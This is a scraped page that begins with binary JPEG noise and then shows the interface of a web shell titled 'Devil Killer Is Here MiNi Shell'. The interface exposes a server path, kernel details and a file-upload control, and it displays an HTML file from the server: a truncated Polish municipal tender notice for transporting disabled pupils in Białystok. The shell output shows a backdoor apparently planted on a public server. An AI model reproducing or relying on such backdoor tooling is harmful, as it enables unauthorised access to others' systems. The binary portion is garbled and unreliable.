JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220927/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220927/0036565301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług transportowych uczniów do specjalnych placówek oświatowych w Białymstoku wraz z zapewnieniem opieki w czasie przejazdów w roku szkolnym 2022/2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Czarna Białostocka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Torowa 14 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czarna Białostocka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">857131340</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">857131349</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@czarnabialostocka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip-umczarnabialostocka.wrotapodlasia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług transportowych uczniów do specjalnych placówek oświatowych w Białymstoku wraz z zapewnieniem opieki w czasie przejazdów w roku szkolnym 2022/2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f2eab061-3e3c-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00365653</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00022519/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Świadczenie usług transportowych uczniów do specjalnych placówek oświatowych w Białymstoku wraz z zapewnieniem opieki w czasie przejazdów w roku szkolnym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip-umczarnabialostocka.wrotapodlasia.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/, https://epuap.gov.pl/wps/portal, przetargi@czarnabialostocka.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/ (dotyczy składania ofert), ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal, (adres ESP Zamawiającego: /czarna/SkrytkaESP) oraz poczty elektronicznej: przetargi@czarnabialostocka.pl .<br/>2. Wnioski, zawiadomienia	oraz informacje (zwanymi dalej ogólnie „korespondencją”) Zamawiający i Wykonawcy przekazują powołując się numerem ogłoszenia (BZP) lub numerem referencyjnym postępowania tj. Or.271.15.2022<br/> 1) za pośrednictwem dedykowanego formularza do złożenia, zmiany, wycofania oferty lub wniosku udostępnionego przez miniPortal.<br/> 2) drogą elektroniczną na adres: przetargi@czarnabialostocka.pl, przy czym sposób komunikacji wskazany w pkt 2.2) nie jest właściwy dla oferty oraz dokumentów składanych wraz z ofertą (wymagających szyfrowania), które należy składać w sposób wskazany w pkt 2.1) .<br/> 3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>4. Zamawiający wymaga aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej. <br/>5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z SWZ.<br/>6. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>7. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do<br/>niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>8. Za datę i godzinę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP lub datę ich przekazania za pomocą poczty elektronicznej z zastrzeżeniem, iż ofertę wraz z załącznikami określonymi w rozdziale X. SWZ, pod rygorem odrzucenia oferty na podstawie art 226 ust. 1 pkt 6 Pzp, można przekazać wyłącznie na ePUAP. Dokumenty składane w formie elektronicznej lub w postaci elektronicznej muszą być opatrzone podpisem zaufanym lub podpisem osobistym (zgodnie z art. 63 ust. 2 Pzp). Ofertę, oświadczenia o których mowa w art. 125 ust. 1 Pzp., podmiotowe środki dowodowe, pełnomocnictwa sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt,.rtf,.pdf,.doc,.docx,.odt. Zalecany przez Zamawiającego format danych - .pdf.<br/>9. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem “Formularza komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt. 1 adres e-mail. Sposób sporządzania dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 roz Parla Europ i Rady (UE) 2016/679 z dnia 27 04 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przet danych osob i w sprawie swobodnego przepływu takich dan oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozp o ochronie da-nych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Rozp”, informuję, że:<br/>1.Admin Pani/Pana danych osob jest Gmina Cz B reprez przez Burmistrza Czarnej B z siedzibą: ul. Torowa 14A, 16-020 Cz B,<br/>tel.857131340, e-mail: um@czarnabialostocka.pl.<br/>2.W sprawach z zakresu ochrony dan osob może się Pani/Pan kontaktować się z IOD pod adr e-mail: inspektor@cbi24.pl 3.Dane osob będą przetwarzane w celu związanym z postępowaniem o udzielenie zamó publ.<br/>4.Dane osob będą przechowywane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11.09.2019 r.– Pzp (Dz. U. z 2021 r.<br/>poz. 1129), zwanej dalej PZP, przez okres 4 lat od dnia zak postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5.Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Roz w związku z przepisami PZP.<br/>6.Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dok postę w oparciu o art. 18 oraz art. 74<br/>ust. 4 PZP.<br/>7.Obowiązek podania przez Pani/a danych osobowych bezpośrednio Pani/a dotyczących jest wymogiem ustawowym określonym w<br/>przepisach PZP, związanym z udziałem w postęp o udzielenie zamó publ; konsekwencje niepodania określonych danych wynikają z<br/>PZP.<br/>8.Osoba, której dane dotyczą ma prawo do:<br/>dostępu do treści swoich dan oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania, w przypadku gdy<br/>przetwarzanie danych odbywa się z naruszeniem przepisów Roz służy prawo wniesienia skargi do organu nadzorczego tj. Prezesa<br/>UODO, ul. Stawki 2, 00-193 Wa-wa,<br/>9.Osobie, której dane dotyczą nie przysługuje:w związku z art. 17 ust. 3 lit. b, d lub e Roz prawo do usunięcia dan oso;prawo do<br/>przenoszenia dan osob, o którym mowa w art. 20 Roz; na podstawie art. 21 Roz prawo sprzeciwu, wobec przetwarzania dan osob.<br/>10.W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozp, wymagałoby niewspółmiernie dużego wysiłku,<br/>Admin może żądać od osoby, której dane dotyczą, wskazania dodatkowych inf mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamó publ.<br/>11.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osob, o którym mowa w<br/>art. 16 Roz, nie może skutkować zmianą wyniku postępowania o udzielenie zam publ lub konkursu ani zmianą postanowień umowy<br/>w zakresie niezgodnym z PZP.<br/>12.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Roz, nie ogranicza przetw danych osob do czasu zakoń postępowania o<br/>udzie zamów publicz.<br/>13.W przypadku danych osobowych zamieszczonych przez Admin w Biuletynie ZP, prawa, o których mowa w art. 15 i art. 16 Roz, są<br/>wykonywane w drodze żądania skierowanego do Admin<br/>14.Od dnia zak postępowania o udzielenie zamó, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust. 1 Roz,<br/>spowoduje ograniczenie przetwarzania dan osob zawartych w protokole i załą do protokołu, Admin protokołu, chyba że zachodzą<br/>przesłanki, o których mowa w art. 18 ust. 2 Roz.<br/>15.W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Roz, wymagałoby niewspółmiernie dużego wysiłku,<br/>Admin może żądać od osoby, której dane dotyczą, wskazania dodatkowych inf mających w szczególności na celu sprecyzowanie<br/>nazwy lub daty zakończonego postę o udzielenie zamów.<br/>16.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 Roz,<br/>nie może naruszać integralności protok oraz jego załą.<br/>17.Ponadto inf, iż w związku z przetwarzaniem Pani/a danych osob nie podlega Pan/i decyzjom, które się opierają wyłącznie na<br/>zautomatyzowanym przetw, w tym profilowaniu, o czym stanowi art. 22 Roz.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Or.271.15.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług transportowych uczniów do specjalnych placówek oświatowych w Białymstoku wraz z zapewnieniem opieki w czasie przejazdów w roku szkolnym 2022/2023<br/><br/>Przedmiotem zamówienia jest usługa polegająca na zapewnieniu dojazdu dzieci niepełnosprawnych do przedszkoli, szkół specjalnych i ośrodków szkolno-wychowawczych oraz ich odwóz po zajęciach do miejsc zamieszkania, wraz ze sprawowaniem opieki nad dziećmi w czasie wsiadania, przewozu oraz wysiadania z pojazdu w roku szkolnym 2022/2023. <br/>Zamawiający szacuje dzienną liczbę przejechanych kilometrów : 120 km. Szacowana ilość dni nauki szkolnej – 164. Szacunkowa ilość kilometrów do przejechania w okresie realizacji zadania: 120 km x 164 dni = 19 680 km<br/>1)	Dowozem objętych będzie 10 dzieci. Ośmiorgu z nich dowóz będzie odbywać się przez pięć dni w tygodniu, dwa razy dziennie (dowóz i odwóz). Dwójce zaś dowóz będzie się odbywać dwa razy w tygodniu (dowóz/odwóz do/z internatu/domu) poniedziałek i piątek, tj. w dzień rozpoczęcia nauki w danym tygodniu i dzień zakończenia nauki w danym tygodniu w roku szkolnym 2022/2023. Zamawiający zastrzega, że dni mogą ulec zmianie.<br/>2)	Wykaz miejscowości (miejsc/przystanków) z których zabierane będą dzieci:<br/>	a) Osierodek (1 dziecko)<br/>	b) Kosmaty Borek (1 dziecko)<br/>	c) Czarna Białostocka ul. Młynowa (1 dziecko)<br/> ul. Białostocka (1 dziecko) <br/> ul. Sienkiewicza PKS (6 dzieci)<br/>3) Wykaz placówek oświatowych do których należy dowieść i odebrać dzieci:<br/>	a) Technikum nr 6 z Oddziałami integracyjnymi ul. Sienkiewicza 57 Białystok (1 dziecko)<br/>b) Specjalny Ośrodek Szkolno-Wychowawczy Antoniuk F 40 (internat 2 osoby)<br/>c) Specjalny Ośrodek Szkolno-Wychowawczy Antoniuk F 40 (3 osoby)<br/>d) Przedszkole Terapeutyczne, ul. Dziesięciny 68A (1 osoba)<br/>e) Niepubliczna Szkoła Przysposabiająca do Pracy AKTYWNI ul. Piasta 156 (1 osoba)<br/>f) Szkoła Podstawowa nr 46 Specjalna w Białymstoku, ul. Słonimska 3, 15-029 Białystok (1 osoba)<br/>g) Szkoła Podstawowa nr 17 Specjalna w Białymstoku ul. Rzemieślnicza 12/3 (1 osoba)<br/>4) Wymagania dodatkowe dotyczące realizacji przedmiotu zamówienia:<br/>a)	Wykonawca zobowiązuje się do zapewnienia odpowiedniego standardu świadczonych usług, a biorąc pod uwagę, że przedmiotem umowy jest dowóz uczniów z niepełnosprawnościami, zobowiązuje się przy jego wykonywaniu dołożyć szczególnej staranności.<br/>b)	Uczniowie będą odbierani od rodziców/opiekunów prawnych z miejsca zamieszkania/ przystanków o ustalonej wcześniej godzinie i po dowiezieniu na zajęcia przekazywani pod opiekę nauczyciela lub innej osoby upoważnionej do odbioru.<br/>c)	Po zakończeniu zajęć uczniowie będą odbierani od nauczycieli w szkole/placówce (lub innych osób odpowiedzialnych do przekazania) i po dowiezieniu do miejsca zamieszkania przekazani pod opiekę rodziców/opiekunów prawnych lub upoważnionych osób. Nie dopuszcza się przekazywania uczniów w drodze powrotnej ze szkoły/placówki do domu osobom nieupoważnionym.<br/>d)	Wykonawca musi posiadać wymagane uprawnienia oraz zatrudniać pracowników posiadających odpowiednie kwalifikacje, uprawnienia i doświadczenie do świadczenia usługi.<br/>e)	Wykonawca ponosi pełną odpowiedzialność za ucznia od chwili odebrania/przekazania od/do rodzica/opiekuna prawnego do czasu przekazania/odebrania do/ od nauczyciela w szkole/placówce (lub innych osób odpowiedzialnych).<br/>f)	Obsługę pojazdu stanowić będzie kierowca posiadający wymagane uprawnienia oraz opiekun.<br/>g)	Kierowca w czasie dowozu powinien być wyposażony w telefon komórkowy, którego numer zostanie przekazany Zamawiającemu i rodzicom/opiekunom prawnym uczniów.<br/>h)	Wykonawca zobowiązany jest na własny koszt do:<br/>	Zapewnienia niezbędnego bezpiecznego taboru do dowozu wszystkich uczniów i opiekunów;<br/>	Zapewnienia dowożenia uczniów i opiekunów środkami transportu technicznie sprawnymi, dopuszczonymi do ruchu wg przepisów o ruchu pasażerskim i oznakowanymi stosownie do charakteru świadczonych usług tj. że wykorzystywane są do transportu osób niepełnosprawnych; <br/>	Zapewnienia środków transportu posiadających ubezpieczenie OC i NNW, aktualne badania techniczne dopuszczające pojazd do ruchu;<br/>	Utrzymania w należytym porządku i czystości środków transportu.<br/>i)	Wykonawca winien przeprowadzić wizję lokalną służącą do przygotowania analizy logistycznej tras dowozu w celu uzyskania informacji koniecznych do przygotowania oferty, w szczególności winien sprawdzić liczbę kilometrów na poszczególnych odcinakach trasy i ustalić kolejność odbioru uczniów w sposób jak najbardziej ekonomiczny, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy; koszt wizji lokalnej ponosi Wykonawca.<br/>j)	Zaleca się, aby dowóz wszystkich uczniów w ramach zamówienia na poszczególnych trasach odbywał się jednym środkiem transportu.<br/>k)	W okresie zimowym pojazd musi być ogrzewany, a na stopniach wejściowych do pojazdu nie może zalegać lód i nie mogą one być śliskie.<br/>l)	Wykonawca przed przystąpieniem do wykonania usługi będącej przedmiotem umowy, otrzyma od Zamawiającego szczegółowy wykaz dowożonych uczniów z niepełnosprawnościami wraz z dokładnymi adresami i danymi kontaktowymi do rodziców/opiekunów prawnych.<br/>m)	Wykonawca ma obowiązek ustalić szczegółowe godziny kursów z rodzicami/opiekunami prawnymi uczniów, na podstawie tygodniowego planu lekcji/zajęć ucznia danej szkoły/placówki.<br/>n)	Wykonawca ustali optymalny rozkład jazdy, mając na uwadze jak najkrótszy czas przebywania ucznia z niepełnosprawnościami w podróży z uwzględnieniem, że uczeń z niepełnosprawnościami powinno być dowieziony do szkoły/placówki w takim czasie, aby możliwe było punktualne stawienie się na zajęciach i powrót po ich zakończeniu bez zbędnego oczekiwania.<br/>o)	Ostatecznie ustalony rozkład jazdy Wykonawca przekaże do Zamawiającego przed przystąpieniem do wykonywania usługi, a o wszelkich zmianach rozkładu w trakcie obowiązywania umowy będzie niezwłocznie powiadamiać.<br/>p)	Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu osób. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenia ciała, śmierć czy szkoda materialna, spowodowana działalnością Wykonawcy.<br/>q)	Wykonawca zamówienia musi realizować je zgodnie z przepisami prawa, a w szczególności zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. 2022 r., poz. 180, 209) oraz ustawą z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz. U. z 2022, poz. 988)<br/>r)	W przypadku wystąpienia okoliczności uniemożliwiających Wykonawcy zapewnienie wykonania przewozu, Wykonawca zobowiązany jest do zapewnienia na własny koszt i ryzyko zastępczego wykonania usługi przez innego przewoźnika, który powinien spełniać wszelkie wymagania i obowiązki wynikające ze świadczenia przedmiotowej usługi i przepisów prawa. O przewoźniku zastępczym Wykonawca jest zobowiązany poinformować Zamawiającego. <br/>s)	W przypadku niewykonania obowiązków wynikających z pkt r) SWZ, wykonanie zastępcze zleci Zamawiający, a Wykonawca zobowiązany będzie do pokrycia różnicy w kosztach poniesionych przez Zamawiającego z tytułu wynajęcia innego środka transportu i zapewnienia opieki.<br/>t) Wykonawca, który zostanie wyłoniony w wyniku rozstrzygnięcia niniejszego postępowania przed podpisaniem umowy przedstawi Zamawiającemu dokumenty (potwierdzone za zgodność z oryginałem): <br/>	Kserokopię ubezpieczenia od odpowiedzialność cywilnej (OC) oraz kserokopię ubezpieczenia od następstw nieszczęśliwych wypadków (NNW) wskazanego środka transportu, którym będzie wykonywał usługę;<br/>	Kserokopię dowodu rejestracyjnego środka transportu, którym będzie wykonywał usługę.<br/>u)	Zamawiający zastrzega sobie prawo zmiany tras przewozu uczniów z niepełnosprawnościami, liczby przewozów w tygodniu, terminów ich wykonywania oraz liczby uczniów z niepełnosprawnościami, podyktowanej potrzebami Zamawiającego wynikającymi z obowiązku zapewnienia uczniom z niepełnosprawnościami dowozu do szkół/placówek.<br/>v)	Zamawiający zastrzega sobie prawo zawieszenia usług na czas określony, w szczególności w razie choroby ucznia z niepełnosprawnościami, innych nieprzewidzianych okoliczności uniemożliwiających uczęszczanie ucznia z niepełnosprawnościami do szkoły/placówki.<br/>w)	Zamawiający zastrzega sobie prawo zwiększenia liczby uczniów z niepełnosprawnościami objętych dowozem nie przekraczającej dopuszczalnej ilości osób przewożonych pojazdem nie powodując zmiany wynagrodzenia.<br/>Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Przez kluczowe części zamówienia Zamawiający rozumie zakres obejmujący usługi transportowe w zakresie dowozu uczniów z niepełnosprawnościami z terenu Gminy Czarna Białostocka do przedszkoli, szkół i placówek w roku szkolnym 2022/2023. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w 